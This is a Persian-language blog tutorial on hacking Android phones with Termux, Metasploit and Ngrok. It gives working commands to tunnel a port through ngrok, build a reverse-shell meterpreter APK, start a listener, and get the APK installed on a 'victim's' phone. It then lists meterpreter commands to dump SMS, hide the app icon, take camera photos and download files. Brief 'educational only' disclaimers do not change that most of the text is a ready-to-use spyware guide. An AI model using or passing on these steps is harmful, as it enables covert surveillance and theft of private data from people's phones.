گام به گام آموزش شروع کار با ابزار ترموکس برای هک گوشیهای اندروید
هک گوشی اندروید با استفاده از ترموکس با متاسپلویت و Ngrok از موضوعات پیچیده اما جذاب در دنیای امنیت سایبری است. در این مقاله، ما به طور دقیق و جامع به شما نشان خواهیم داد که چگونه از ابزارهایی مانند ترموکس، متاسپلویت و انگروک (Ngrok) برای هک گوشی اندروید استفاده کنید. اگر شما به دنبال یادگیری مهارت های امنیتی در زمینه تلفن همراه هستید، اینجا بهترین منبع برای شماست.
بیشتر بخوانید: معرفی ۲۰ برنامه هک گوشی اندرویدی
مقدمه: دستیابی به مهارت هک گوشی اندروید
در دنیای امروز، تلفن همراه به یکی از ابزارهای اصلی ما برای ارتباطات، کارهای روزمره و تفریح تبدیل شده است. اما به دلیل پیچیدگی های تکنولوژی و مسائل امنیتی، یادگیری مفاهیم امنیت سایبری برای حفاظت از اطلاعات مهم در تلفن همراه ضروری است.
هک گوشی اندروید با استفاده از ترموکس با متاسپلویت و Ngrok: چرا این مهارت مهم است؟
در دنیای امروز، تلفن همراه دارای اطلاعات حساسی است که ممکن است در معرض خطر قرار گیرند. از جمله اطلاعات شخصی، پیام ها، عکس ها و حتی اطلاعات بانکی. این مقاله به شما یاد خواهد داد که چگونه با استفاده از ترموکس، متاسپلویت و انگروک(Ngrok) به عنوان ابزارهای قدرتمند، گوشی اندروید را امن نگه داشته و از تهدیدهای امنیتی محافظت کنید.
مرحله به مرحله: راهنمای هک گوشی اندروید
نصب و راهاندازی ترموکس و ابزارهای موردنیاز
برای شروع، باید ترموکس و ابزارهای مورد نیاز را روی دستگاه خود نصب کنید. این ابزارها به شما امکان اجرای دستورات هک را خواهند داد. در اینجا لیستی از ابزارهای لازم برای شروع به کار داریم:
- ترموکس: ابزار کلیدی برای اجرای دستورات هک.
- متاسپلویت: برای آزمایش آسیبپذیریها و اجرای اسکریپتهای مخرب.
- Ngrok: جهت بررسی امنیت و تست نفوذ به سیستم.
با نصب این ابزارها، ابتداگاهی قوی در دنیای هک گوشی اندروید به دست میآورید.
راهنمای هک گوشی اندروید با استفاده از ترموکس و متاسپلویت
در این پست، قصد داریم یاد بگیریم چگونه از طریق ترموکس با متاسپلویت گوشی های اندروید را هک کنیم. شما میتوانید دستورات را یکی یکی در اپلیکیشن ترموکس کپی و پیست کنید و آنها به درستی کار خواهند کرد.
توجه: این پست تنها برای اهداف آموزشی است. من و این سایت هیچگونه فعالیت جنایی را پشتیبانی نمیکنیم. اگر از اطلاعات این پست به نحوهای سوءاستفاده میکنید، این سایت مسئولیتی ندارد. این سایت تنها هک اخلاقی را پشتیبانی میکند.
نیازمندیها:
ترموکس: اگر میخواهید در مورد ترموکس بیشتر بدانید [ترموکس چیست؟ – دانلود ترموکس]
متاسپلویت: اگر متاسپلویت را در ترموکس خود ندارید [نصب متاسپلویت در ترموکس]
تست آسیب پذیریها و شناسایی نقاط ضعف گوشی اندویدی
با استفاده از متاسپلویت و انگروک، میتوانید تست آسیبپذیریها و نقاط ضعف موجود در گوشی اندروید هدف انجام دهید. با این کار، به طور دقیق از امنیت گوشی مورد نظر آگاهی پیدا میکنید و میتوانید تدابیر لازم را برای محافظت از آن اتخاذ کنید.
اجرای دستورات هک با استفاده از ترموکس
ترموکس به شما امکان اجرای دستورات متنوعی را روی دستگاه هدف میدهد. از اسکن شبکه تا نفوذ به سیستم، از ترموکس برای انجام عملیات هکی مختلف استفاده میشود. این ابزار با ارائه محیط خط فرمان، به شما امکان تعامل با سیستم را میدهد و دستورات مختلفی را برای تست و بررسی اجرا میکند.
ویژگیهای برنامه ترموکس (Termux)
ترموکس یک برنامه قدرتمند است که امکان دسترسی به محیط خط فرمان لینوکسی را در دستگاههای اندرویدی فراهم میکند. این برنامه دارای ویژگیهای بینظیری است که به شما اجازه میدهد از ابزارهای هک و تست نفوذ بر روی دستگاههای اندرویدی خود استفاده کنید. در این بخش، به برخی از ویژگیهای مهم ترموکس پرداخته خواهد شد.
1. محیط خط فرمان لینوکسی
ترموکس به شما محیطی مشابه با محیط خط فرمان لینوکسی ارائه میدهد. این به شما امکان میدهد دستورات لینوکسی را در دستگاه اندرویدی خود اجرا کنید و به عنوان یک توسعهدهنده یا تخصصی در زمینه امنیت سایبری فعالیت کنید.
2. نصب ابزارهای مختلف
با استفاده از ترموکس، میتوانید ابزارهای مختلفی را روی دستگاه اندرویدی خود نصب کنید. از ابزارهای هک تا ابزارهای توسعه نرمافزار، همه در اختیار شما خواهند بود.
3. اجرای اسکریپتها و دستورات
شما میتوانید اسکریپتها و دستورات خود را از طریق ترموکس اجرا کنید. این ویژگی برای تست نفوذ و بررسی امنیت سیستمها بسیار مفید است.
4. پشتیبانی از پکیجهای APT
ترموکس از مدیریت پکیجهای APT پشتیبانی میکند. این به شما امکان میدهد پکیجهای مورد نیاز خود را با استفاده از ابزار مدیریت پکیجهای APT نصب، بهروزرسانی و حذف کنید.
5. استفاده از ترموکس بدون نیاز به دسترسی روت
برخلاف بسیاری از برنامههای مشابه، ترموکس نیازی به دسترسی روت بر روی دستگاه شما ندارد. این به معنای این است که میتوانید از این برنامه بر روی دستگاه اندرویدی خود استفاده کنید بدون اینکه به دسترسیهای سیستمی عمیقی نیاز داشته باشید.
6. پشتیبانی از اسکریپتهای Shell
ترموکس به شما اجازه میدهد اسکریپتهای Shell خود را اجرا کنید. این ویژگی به شما امکان میدهد از اسکریپتهای خود برای انجام عملیات مختلف استفاده کنید.
7. اتصال به سرورها و دستگاههای دیگر
با استفاده از ترموکس، میتوانید به سرورها و دستگاههای دیگر از طریق SSH، Telnet و …
پورت فوروارد با استفاده از انگروک در ترموکس:
اگر میخواهید از متاسپلویت در شبکه محلی استفاده کنید، میتوانید این مرحله را رد کنید (اگر شما و قربانیتان به همان وایفای متصل هستید، میتوانید این مرحله را رد کنید).
با کمک پورت فوروارد، میتوانیم به گوشی قربانی دسترسی پیدا کنیم، از طریق دادههای موبایلی، به این معنی که اگر از سیمکارت استفاده میکنید، باید پورت فوروارد را برای استفاده از متاسپلویت انجام دهید.
مرحله 1: به سایت Ngrok.com بروید و یک حساب کاربری ایجاد کنید. اگر از قبل حسابی در ngrok دارید، وارد شوید.
مرحله 2: فایل فشرده Ngrok را روی گوشی خود دانلود کنید. اندازه این فایل تقریباً 12 مگابایت خواهد بود.
مرحله 3: اکنون یک فایل فشرده خواهید دید که از وب سایت Ngrok دانلود کردهاید.
ترموکس را باز کرده و به آن فایل فشرده رفته و در صورتی که در پوشه دانلود شما نیست یا نمیتوانید پوشه دانلود خود را ببینید، فقط مدیر فایل را باز کرده و فایل زیپ را در حافظه داخلی خود جایگذاری کنید و به ترموکس بروید و cd storage را وارد کنید.
مرحله 4: این دستور را تایپ کنید تا فایل زیپ را در دایرکتوری خانگی ترموکس خود کپی کنید.
cp ngrok-stable-linux-arm.zip /$HOME
مرحله 5: این دستور را تایپ کنید تا به دایرکتوری خانگی خود بازگردید.
cd /$HOME
مرحله 6: این دستور را تایپ کنید تا فایل را از حالت فشرده خارج کنید.
unzip ngrok-stable-linux-arm.zip
مرحله 7: دوباره به سایت Ngrok بروید و توکن را کپی کنید (لطفاً توکن کامل را کپی کنید)
مرحله 8: ترمینال را باز کنید و این کد را تایپ کنید و توکن خود را جایگذاری کنید و دکمه Enter را بزنید.
./ngrok authtoken
مرحله 9: این دستور را تایپ کنید تا شروع به فوروارد پورت در پورت 1275 کنید.
./ngrok tcp 1275
شما میتوانید هر شمارهی پورتی را که میخواهید استفاده کنید، اینجا من از شمارهی 1275 استفاده میکنم.
مرحله 10: اگر شما هم به این خطا برخورد میکنید، کافیست هاتاسپات خود را باز کنید و این مشکل ظرف 30 تا 60 ثانیه حل میشود.
ایجاد پیلود در متاسپلویت:
پیلود یک فایل apk خواهد بود که قصد داریم آن را در گوشی قربانی نصب کنیم. این به ما امکان میدهد که به گوشی اندرویدی قربانی دسترسی پیدا کنیم.
مرحله 1: یک نشست جدید در ترموکس باز کنید (صفحهی خود را از چپ به راست بکشید و بر روی نشست جدید کلیک کنید). لطفاً مطمئن شوید که ترموکس دسترسی به حافظه را دارد. اگر دسترسی به حافظه را ندارید، دستورات زیر را تایپ کنید.
termux-setup-storage
دسترسی به حافظه را برای ترموکس اجازه دهید.
مرحله 2: این دستور را تایپ کنید تا یک پیلود ایجاد کنید و دکمه Enter را بزنید.
لطفاً LHOST و LPORT خود را با توجه به تصویر زیر تغییر دهید.
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
مرحله 3: به حافظه داخلی خود بروید و فایل Android.apk را خواهید دید.
این فایل apk را در گوشی قربانی نصب کنید.
شروع کننده (Msfconsole):
مرحله 1: این دستور را در پنجره ترموکس برای شروع msfconsole تایپ کنید.
msfconsole
ممکن است تا 30 ثانیه طول بکشد تا آغاز شود.
مرحله 2: این دستور را تایپ کنید تا Multi handler در Metasploit را آغاز کنید.
use exploit/multi/handler
مرحله 3: این دستور را تایپ کنید تا پیلود را تنظیم کنید.
set payload android/meterpreter/reverse_tcp
مرحله 4: حالا LHOST را تنظیم کنید که میخواهید به جلسه گوش دهید.
اگر از فوروارد پورت Ngrok استفاده میکنید، این آدرس IP را وارد کنید، اما اگر از فوروارد پورت استفاده نمیکنید، آیپی محلی خود را وارد کنید.
set LHOST 127.0.0.1
مرحله 5: حالا LPORT را تنظیم کنید.
اگر از Ngrok استفاده میکنید، همان پورتی را که در هنگام فوروارد پورت استفاده کردهاید تنظیم کنید.
اگر از فوروارد پورت استفاده نمیکنید، فقط پورت مشابهی که برای ایجاد پیلود استفاده کردهاید، وارد کنید.
set LPORT 1275
مرحله 6: این آخرین دستور است و گوشی هک میشود.
exploit.
به قربانی متصل میشود و جلسه meterpreter را به شما ارائه میدهد.
[ساخت apk Payload خود را بیشناس در مقابل امنیت گوگل پلی استور کنید]
نصب APK ترموکس در گوشی هدف
پس از ایجاد برنامه هک با استفاده از ترموکس (Termux)، شما ممکن است نیاز داشته باشید این برنامه را در دستگاه اندرویدی قربانی نصب کنید. در این مرحله، باید فایل Android.apk
را به دستگاه اندرویدی قربانی منتقل کنید و سپس آن را نصب نمایید. در ادامه به توضیح مراحل این عملیات خواهیم پرداخت.
1. انتقال فایل APK به دستگاه هدف
برای انتقال فایل Android.apk
به دستگاه اندرویدی قربانی، میتوانید از روشهای مختلفی مانند بلوتوث، ایمیل، پیامک یا حتی کابل USB استفاده کنید. مطمئن شوید که فایل به صورت امن و بدون تغییر در دستگاه قرار میگیرد.
2. نصب فایل APK
پس از انتقال فایل APK به دستگاه، باید اقدام به نصب آن کنید. برای این کار مراحل زیر را دنبال کنید:
- روی فایل
Android.apk
که در دستگاه قربانی ذخیره شده است، کلیک کنید. - دستگاه اندرویدی قربانی نسبت به نصب برنامه هشدار خواهد داد. روی گزینه “نصب” کلیک کنید.
3. اجرای برنامه ترموکس
پس از نصب موفقیتآمیز برنامه Android.apk
، میتوانید اقدام به اجرای آن کنید. مطمئن شوید که دستگاه قربانی از اتصال اینترنتی فعال برخوردار است تا برنامه به درستی کار کند.
توجه: احترازهای امنیتی
استفاده از ابزارهایی مانند Android.apk
به منظور نصب برنامهها بر روی دستگاههای دیگر بدون اجازه آنها میتواند نقض امنیت و حریم خصوصی باشد. تا حد امکان، از انجام این کارها خودداری کنید و همیشه احتیاط لازم را به عمل آورید.
چند دستور مفید در Meterpreter.
یافتن تمام دستورات موجود:
این دستور لیستی از دستورات و توضیحات کوتاهی از آن دستورات را به شما میدهد.
help
دریافت پیامهای کوتاه از گوشی قربانی به تلفن شما:
این دستور پنجاه پیام مهمترین پیامهای کوتاه را از گوشی قربانی به شما میدهد.
dump_sms
شما یک فایل متنی دریافت خواهید کرد که تمام پیامهای کوتاه با جزئیات را در خود دارد، فقط از دستور cat برای باز کردن فایل استفاده کنید.
مخفی کردن نماد اپلیکیشن ارسالی به قربانی:
اگر شما دارید یک اپلیکیشن را روی گوشی قربانی نصب میکنید، طبیعی است که قربانی متوجه شود و احتمالاً این اپلیکیشن را حذف خواهد کرد. با استفاده از دستور زیر میتوانید نماد اپلیکیشن را از گوشی قربانی مخفی کنید.
hide_app_icon
تغییر حالت صدای گوشی قربانی:
شما میتوانید با استفاده از دستور زیر گوشی را در حالت عمومی قرار دهید.
set_audio_mode -m 1
شما میتوانید set_audio_mode -m 0 را تایپ کنید تا گوشی را ساکت کنید.
گرفتن تصاویر از دوربین گوشی قربانی:
این دستور یک عکس از دوربین گوشی قربانی گرفته و آن را به پوشه ذخیره شما ارسال میکند.
webcam_snap
دسترسی به فضای ذخیرهسازی فایلهای قربانی:
شما میتوانید به پوشهها و فایلهای قربانی دسترسی پیدا کنید و تمام دادهها را مشاهده کنید.
cd /sdcard
شما میتوانید دستور ls را تایپ کنید تا فهرست پوشهها نمایش داده شود. اگر میخواهید در مورد دستورات پایه ترموکس بیشتر بدانید، این پست را مطالعه کنید.
دانلود هر فایل از گوشی قربانی:
به مسیر فایلی که میخواهید دانلود کنید بروید و این دستور را تایپ کنید.
download file-name
نتیجه گیری:
حالا شما دارای یک جلسه meterpreter هستید، که به معنای دسترسی به گوشی قربانی است. اما اگر قربانی اپلیکیشن را حذف کرد، نمیتوانید دسترسی به گوشی را داشته باشید. اگر میخواهید بدانید چگونه میتوانیم حتی اگر قربانی گوشی را راهاندازی مجدد کند، به گوشی دسترسی داشته باشیم، به این [چگونگی مخفی کردن نماد اپلیکیشن و ایجاد پیلود ماندگار در متاسپلویت] مراجعه کنید. اگر سوالی دارید، میتوانید در نظرات از من بپرسید. با تشکر از خواندن و همیشه اخلاقی بمانید👾.
پرسشهای متداول در مورد هک تلفن اندروید
آیا برای یادگیری هک حتماً نیاز به پیشزمینه تخصصی دارم؟
خیر، برای شروع یادگیری هک تلفن اندروید، نیاز به پیشزمینه تخصصی خاصی ندارید. با مطالعه و تمرین منظم، میتوانید از مبتدی به متخصص پیشرفت کنید.
آیا هک تلفن اندروید من را در معرض خطر قرار میدهد؟
هک تلفن اندروید به درستی انجام شده و بدون اخذ مجوز معمولاً مشکلات امنیتی بوجود میآورد. بهترین راه برای جلوگیری از مشکلات امنیتی این است که از اطلاعات امنیتی در حفظ و به روزرسانی تلفن همراه خود مراقبت کنید.